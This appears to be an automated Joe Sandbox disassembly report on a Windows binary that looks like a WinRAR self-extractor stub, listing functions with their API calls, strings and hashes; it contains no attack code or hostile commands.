LICENSEDLG, xrefs: 00007FF6EF6D211E

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ItemTextWindow
String ID: LICENSEDLG
API String ID: 2478532303-2177901306
Opcode ID: 17dfc627028cba28be5a2bf4ffb6ce9a1a66f36b6f2080bc31abf3f60b7aedf5
Instruction ID: 99970969530b08f62fef2ba8920d5ee39d3c67002b15cd789f6c8460e10cafd4
Opcode Fuzzy Hash: 17dfc627028cba28be5a2bf4ffb6ce9a1a66f36b6f2080bc31abf3f60b7aedf5
Instruction Fuzzy Hash: B7417C6BA0C64283FB50AB12BC5037823A5AF89F81F144135DA0DC7BA5CF3FA556970A

Function 00007FF6EF6D47EC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF6EF6D4831
GetClassNameW.USER32 ref: 00007FF6EF6D485E
GetWindowLongPtrW.USER32 ref: 00007FF6EF6D487F
SendMessageW.USER32 ref: 00007FF6EF6D4899
GetObjectW.GDI32 ref: 00007FF6EF6D48B4
SendMessageW.USER32 ref: 00007FF6EF6D48E9
DeleteObject.GDI32 ref: 00007FF6EF6D48F2
GetWindow.USER32 ref: 00007FF6EF6D4900

Strings

STATIC, xrefs: 00007FF6EF6D4864

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassDeleteLongName
String ID: STATIC
API String ID: 2845197485-1882779555
Opcode ID: 7ac47d7ed1b220d745810030047bda2d9fbd8d42c9736def71ff58465e4c96f3
Instruction ID: f39a83f6de5d38a8efd799ea9f8bd51a14a0eafe3a2095187335ab1054f90b51
Opcode Fuzzy Hash: 7ac47d7ed1b220d745810030047bda2d9fbd8d42c9736def71ff58465e4c96f3
Instruction Fuzzy Hash: 4C31A127B0D68247FE60AB12A9507B92395AB89BC4F204031DD4D8774ADF3FE9029B06

Function 00007FF6EF6D1240 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32 ref: 00007FF6EF6D126F
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF6EF6D1281
SystemTimeToFileTime.KERNEL32 ref: 00007FF6EF6D1291
FileTimeToSystemTime.KERNEL32 ref: 00007FF6EF6D12A1
GetDateFormatW.KERNEL32 ref: 00007FF6EF6D12C7
GetTimeFormatW.KERNEL32 ref: 00007FF6EF6D12FF
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6D132A

Strings

2, xrefs: 00007FF6EF6D12DB
%s %s, xrefs: 00007FF6EF6D1320

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecificswprintf
String ID: %s %s$2
API String ID: 1692029381-3036323853
Opcode ID: ede5e6b769960d0b1a275bfac8d84711a033dd5369ce5698a12840544c12596f
Instruction ID: 4f71f19abc348206126d90e7cec8fba1905f7df955407f550b3aeef2d3b85fdd
Opcode Fuzzy Hash: ede5e6b769960d0b1a275bfac8d84711a033dd5369ce5698a12840544c12596f
Instruction Fuzzy Hash: FB21A973A08A4597EB109F65F8007DA73A5FF88798F401032EA4D57A68DF3DD149CB04

Function 00007FF6EF6C37E8 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6EF6C38FE

Part of subcall function 00007FF6EF6C4F90: GetSystemDirectoryW.KERNEL32(00000000,00007FF6EF6C3830), ref: 00007FF6EF6C4FBE

GetProcAddress.KERNEL32 ref: 00007FF6EF6C3846
GetProcAddress.KERNEL32 ref: 00007FF6EF6C3861

Strings

Crypt32.dll, xrefs: 00007FF6EF6C3824
CryptUnprotectMemory failed, xrefs: 00007FF6EF6C38F5
CryptProtectMemory failed, xrefs: 00007FF6EF6C38B4
CryptProtectMemory, xrefs: 00007FF6EF6C383C
CryptUnprotectMemory, xrefs: 00007FF6EF6C3853

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 2915667086-2207617598
Opcode ID: 3b073771c7bcd138a86693d0fe2c0e03bdb42b3ae7d59337cbbdfc84a2f6350c
Instruction ID: e381ad4f73715deeb83705bf088b3946fe7a97ff696c5d8c94d2ec05cf354b0a
Opcode Fuzzy Hash: 3b073771c7bcd138a86693d0fe2c0e03bdb42b3ae7d59337cbbdfc84a2f6350c
Instruction Fuzzy Hash: CB316F27B0A70383FE54CB15A8413742369AF44B94F440135E84E8B3A4EF7FE556E30A

Function 00007FF6EF6D9C8C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6EF6D9E2A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6EF6DA14D
abort.LIBCMT ref: 00007FF6EF6DA181

Strings

csm, xrefs: 00007FF6EF6D9D71
csm, xrefs: 00007FF6EF6D9E51
csm, xrefs: 00007FF6EF6D9DD3

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2940173790-393685449
Opcode ID: a5bd8a248080d43b613735530291df55df3c9da5d07db07e5248e4fa39f42a24
Instruction ID: 95a5dd88ea2a4e87c0709111cfbd24d740672fc9e28e123ff57cc23ee416a35a
Opcode Fuzzy Hash: a5bd8a248080d43b613735530291df55df3c9da5d07db07e5248e4fa39f42a24
Instruction Fuzzy Hash: 83E193739086828BE720AF34D4803BD3BA8EB54748F244135DE4D87796DF3AE581EB46

Function 00007FF6EF6BE8D4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 161COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00007FF6EF6BEADC

Strings

ROOT\CIMV2, xrefs: 00007FF6EF6BE91A
WQL, xrefs: 00007FF6EF6BE9EA
Name, xrefs: 00007FF6EF6BEAAF
SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF6EF6BE9D7
Windows 10, xrefs: 00007FF6EF6BEAC0

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ClearVariant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 1473721057-3505469590
Opcode ID: 109e0eb20b2feaddf5308beb1d30b3f2d6e9e237cd0707f6e0f8bfdb3fec98d4
Instruction ID: a37fdc2b43ba2345537139af55ab89a2c559347648026808738f084fa5b8902a
Opcode Fuzzy Hash: 109e0eb20b2feaddf5308beb1d30b3f2d6e9e237cd0707f6e0f8bfdb3fec98d4
Instruction Fuzzy Hash: 25715E37A18B0687EB10DF25E8806AD7778FB94B88B005532EA4E83B68DF3ED544D705

Function 00007FF6EF6BC338 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF6EF6BC384
GetShortPathNameW.KERNEL32 ref: 00007FF6EF6BC3A5

Part of subcall function 00007FF6EF6C6B34: CompareStringW.KERNEL32(?,?,00007FF6EF6BFD10), ref: 00007FF6EF6C6B53

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6BC44F
MoveFileW.KERNEL32 ref: 00007FF6EF6BC4BD
MoveFileW.KERNEL32 ref: 00007FF6EF6BC505

Strings

rtmp%d, xrefs: 00007FF6EF6BC445

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortStringswprintf
String ID: rtmp%d
API String ID: 2308737092-3303766350
Opcode ID: c0275ade39ceb1d8056d394355d336ad814de7b7ade98d997f472c92bd8ab29b
Instruction ID: bfa641e6342f2f907ab6abcb27b51bf73078c23d762e96395a44b5348938d864
Opcode Fuzzy Hash: c0275ade39ceb1d8056d394355d336ad814de7b7ade98d997f472c92bd8ab29b
Instruction Fuzzy Hash: C5514623A1C58647DA30AF21D8503FD2368BF45B84F811432E94DDB69EDE2EE706E346

Function 00007FF6EF6D0298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF6EF6D02DC
GetWindowRect.USER32 ref: 00007FF6EF6D032D
ShowWindow.USER32 ref: 00007FF6EF6D0405
SetWindowTextW.USER32 ref: 00007FF6EF6D0411
ShowWindow.USER32 ref: 00007FF6EF6D042E

Strings

RarHtmlClassName, xrefs: 00007FF6EF6D03AA

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: b91dfe9626c691e5521310d2b7ca57a7b03ad7aa33bf76d6300ffe2a0bfd6312
Instruction ID: 4f5b811daa4e88c3b355744292489d3d238b502405472d8d39fc5fdc485423c3
Opcode Fuzzy Hash: b91dfe9626c691e5521310d2b7ca57a7b03ad7aa33bf76d6300ffe2a0bfd6312
Instruction Fuzzy Hash: 9D519367A0978287EE649F12B45033A63A4FF88B80F544435DE8E87B58CF3FE0558B05

Function 00007FF6EF6D5ED8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF6EF6D5E47,?,?,?,00007FF6EF6D61FA), ref: 00007FF6EF6D5EFF
GetProcAddress.KERNEL32(?,?,?,00007FF6EF6D5E47,?,?,?,00007FF6EF6D61FA), ref: 00007FF6EF6D5F1C
GetProcAddress.KERNEL32(?,?,?,00007FF6EF6D5E47,?,?,?,00007FF6EF6D61FA), ref: 00007FF6EF6D5F38

Strings

ReleaseSRWLockExclusive, xrefs: 00007FF6EF6D5F27
AcquireSRWLockExclusive, xrefs: 00007FF6EF6D5F12
KERNEL32.DLL, xrefs: 00007FF6EF6D5EF8

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: a285e220308e788f2ab36963cfab2be891698921037f4134e9d32917d0b7cf85
Instruction ID: 69cf9f31d1415f7683f437d8329ead0e64217ea4eb5f152110fdc0103404fe56
Opcode Fuzzy Hash: a285e220308e788f2ab36963cfab2be891698921037f4134e9d32917d0b7cf85
Instruction Fuzzy Hash: D1118E27A09B0383FE509B00A94037413996F18788F6C0434C85DCB750EEBFF890AB0A

Function 00007FF6EF6C5C14 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6BEB40: GetVersionExW.KERNEL32 ref: 00007FF6EF6BEB71

FileTimeToLocalFileTime.KERNEL32 ref: 00007FF6EF6C5C7C
FileTimeToSystemTime.KERNEL32 ref: 00007FF6EF6C5C88
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF6EF6C5C98
SystemTimeToFileTime.KERNEL32 ref: 00007FF6EF6C5CA6
SystemTimeToFileTime.KERNEL32 ref: 00007FF6EF6C5CB4
FileTimeToSystemTime.KERNEL32 ref: 00007FF6EF6C5CF5

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 1ba7e9eeb29331dbf72bee44956e7281ce906d28814823c0f1390a1f09b24211
Instruction ID: c4f700b9b2cd64a8ea8beb164dc3f4f76f5509df0d3635ca62f4f8966270d678
Opcode Fuzzy Hash: 1ba7e9eeb29331dbf72bee44956e7281ce906d28814823c0f1390a1f09b24211
Instruction Fuzzy Hash: 86517BB3B106518BEB14CFA8D8441AC37B5F748788B60403ADE4EABB58DF39E945C704

Function 00007FF6EF6C5F14 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF6EF6C5F78

Part of subcall function 00007FF6EF6BEB40: GetVersionExW.KERNEL32 ref: 00007FF6EF6BEB71

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF6EF6C5F9A
FileTimeToSystemTime.KERNEL32 ref: 00007FF6EF6C5FA6
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF6EF6C5FB6
SystemTimeToFileTime.KERNEL32 ref: 00007FF6EF6C5FC4
SystemTimeToFileTime.KERNEL32 ref: 00007FF6EF6C5FD2

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 720de4bf0058d3d5f955e2258e2d7ea23c03fb14de544732891b4eab8a87f0bb
Instruction ID: 55873749a7a0ddf145a2411a95c877fafd710d039c8637197e3ce8fcdeb42b78
Opcode Fuzzy Hash: 720de4bf0058d3d5f955e2258e2d7ea23c03fb14de544732891b4eab8a87f0bb
Instruction Fuzzy Hash: 2E315B63B106528EFB00CFB5D8902AC3374FF08758B54502AEE4EA7A58EF38D595D705

Function 00007FF6EF6CFC48 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

wcscpy.LIBCMT ref: 00007FF6EF6CFC99

Strings

<br>, xrefs: 00007FF6EF6CFCDA
 , xrefs: 00007FF6EF6CFD17
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF6EF6CFC8F

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: wcscpy
String ID:  $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 1284135714-864536935
Opcode ID: 5ff72e1646fdf217060b8e5c8401fb4e7bd885afca845a2c4c4fb9e22c13992d
Instruction ID: 493aaf9ddc506550ec65c4d7cbb08b67a85cb3f83d8ab8b6aaeffe21f1170028
Opcode Fuzzy Hash: 5ff72e1646fdf217060b8e5c8401fb4e7bd885afca845a2c4c4fb9e22c13992d
Instruction Fuzzy Hash: 8C31B953E0968283FF20AB11E4003795374EF50B84F548131DA8D8B295EF7EF581A3AB

Function 00007FF6EF6D9424 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6EF6D944F
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6EF6D94E4
RtlUnwindEx.KERNEL32 ref: 00007FF6EF6D9533

Strings

csm, xrefs: 00007FF6EF6D94CA
f, xrefs: 00007FF6EF6D9462

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a9fd0d1b92df2077d9d556c6e535e3c3ecfdf6053e06fd4b056f1dc7555dcd55
Instruction ID: 722e791006949a13edc9c7c01bf8727d84e2e93bb6d9bf6738bb7c246599248f
Opcode Fuzzy Hash: a9fd0d1b92df2077d9d556c6e535e3c3ecfdf6053e06fd4b056f1dc7555dcd55
Instruction Fuzzy Hash: 8D51B233A1964687DB14EF15E444B2837A9FB44B98F608130DA5E87748EF3BE941EF09

Function 00007FF6EF6D1BBC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6EF6D1D4A
GetDlgItemTextW.USER32 ref: 00007FF6EF6D1D67
SetDlgItemTextW.USER32 ref: 00007FF6EF6D1D9C

Strings

GETPASSWORD1, xrefs: 00007FF6EF6D1D03
Software\WinRAR SFX, xrefs: 00007FF6EF6D1C22

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ItemText$Dialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 1770891597-1315819833
Opcode ID: 5bf63ad80377ea271053d36964ce907f0b842b71eae3d6b85010761951103002
Instruction ID: 2f40f952362aa5612594788df7534836fec45b6c032c3af8683bf78afd261096
Opcode Fuzzy Hash: 5bf63ad80377ea271053d36964ce907f0b842b71eae3d6b85010761951103002
